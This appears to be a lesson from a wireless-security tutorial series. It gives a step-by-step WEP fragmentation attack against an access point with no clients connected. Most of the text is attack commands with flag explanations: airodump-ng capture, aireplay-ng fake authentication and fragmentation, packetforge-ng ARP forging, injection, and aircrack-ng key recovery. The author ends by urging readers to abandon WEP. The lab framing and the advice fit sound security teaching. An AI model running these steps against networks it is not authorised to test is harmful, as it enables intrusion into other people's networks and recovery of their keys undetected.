16 – WEP Fragmentation attack – NO Clients

Configure your access point as it was in the previous lesson, please refer to that lesson also for more information on this attack vector as it is explained a bit more in the previous lesson, the reason for this lesson is to show you that it also works with no clients attached to the access point.

First things first put your card into monitor mode1 - Enable monitor modeStart airodump-ng

airodump-ng mon0 -c 6 –bssid 2C:B0:5D:XX:XX:XX -w frag

“airodump-ng” to start airodump-ng
“mon0” is to set the interface of your wireless card
“-c” is to set your channel which is currently set to 1
“–bssid” is to set the MAC address of the access point
“-w” is to write this to a capture file called frag2 - Starting airodump-ngOutput of airodump-ng currently looks like the following with no data packets being sent or received on the network currently3 - airodump-ng outputNext run aireplay-ng to do a fake authentication with the access point using your actual physical card MAC address

aireplay-ng -1 0 -e test -a 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0

“aireplay-ng” to start aireplay-ng
“-1” is for a fake authentication
“0” is for re-association timing in seconds and may need to be adjusted
“-a” is followed by the MAC addres of the access point
“-h” is the physical MAC address of your card
“mon0” is the interface of the wireless card4 - fake authentication with the access pointOutput of airodump-ng now looks like the following with our card associated with the access point using the fake authentication5 - airodump-ng output after fake authenticationRun the fragment attack

aireplay-ng -5 -e test -b 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0

“aireplay-ng” to start aireplay-ng
“-5” specifies that you want to run the fragmentation attack
“-e” is to specify the SSID of the access point which is test
“-b” is to set the MAC address of the access point
“-h” is your physical wireless card MAC address
“mon0” is the interface of your wireless card6 - fragmentation attack no clientsSuccessful output from the fragmentation attack looks like the following above, as you can see we have obtained the keystream and it is saved in the xor file which we can now use to create an arbitrary packet using packetforge-ng next.

packetforge-ng -0 -a 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX -k -l -y replay_dec.xor -w arp-request

“packetforge-ng” to start packetforge-ng
“-0” is to forge an arp packet
“-a” is for specifying the access point MAC address
“-h” is to specify your wireless card MAC address
“-k” is for setting the destination IP and or port in this case a broadcast
“-l” which is a lower case ‘L’ to save confusion is for setting the source and or port which is once again a broadcast
“-y” is to use the xor file obtained from the fragmentation attack to forge the packet
“-w” is to write the forged packet to a file which is called arp-request7 - packetforge-ng arp requestA quick look at airodump-ng before we start to see the data packets and make sure we are still associated with the access point, if you are not just run the fake authentication again before you continue.8 - airodump-ng outputOnce you have your packet forged from the previous step you can then inject it into the access point issuing the following aireplay-ng parameters

“aireplay-ng” will start aireplay-ng
“-2” is to run an interactive packet replay
“-r” is to select the file in which to extract packets from in which is arp-request here
“mon0” is the interface of your card to run this from9 - aireplay-ng arp packet injectionWait a few minutes to generate enough packets before running aircrack-ng as I noticed on the Raspberry Pi 2 anyway this seems to freeze the injection process and thus means restarting the process over again, wait for a few minutes and you should see the data has risen greatly, the more data packets seen here the better for the cracking process10 -airodump-ng output data packets growing hugelyStart aircrack-ng against the airodump-ng capture using the following

“aircrack-ng” starts aircrack-ng
“frag-01.cap” is the name of the capture file in which to run aircrack-ng against

As you can see we have obtained a huge amount of IV’s  so this should be quick and easy11 - start aircrack-ngAircrack-ng success looks like the following12 - aircrack-ng success no clientsLesson learned:

I really find I am repeating myself now when it comes to WEP encryption and you can probably already hear me saying it, don’t use WEP! If you know somebody using it help them out and teach them how to secure their network . Much like the Chopchop attack carried out in the previous lesson this allows you to greatly increase the speed in which you can obtain and crack the WEP key by increasing the volume of data packets on the network by injecting our arbitrary arp packets forged with packetforge-ng into the access point in order to obtain more IV’s and speed up the cracking process. Even when no clients are connected to the access point this attack can still be carried out and the WEP key obtained, you would not even notice anything suspicious on any of your wireless clients as you most likely will not know this was even carried out.



Leave a Reply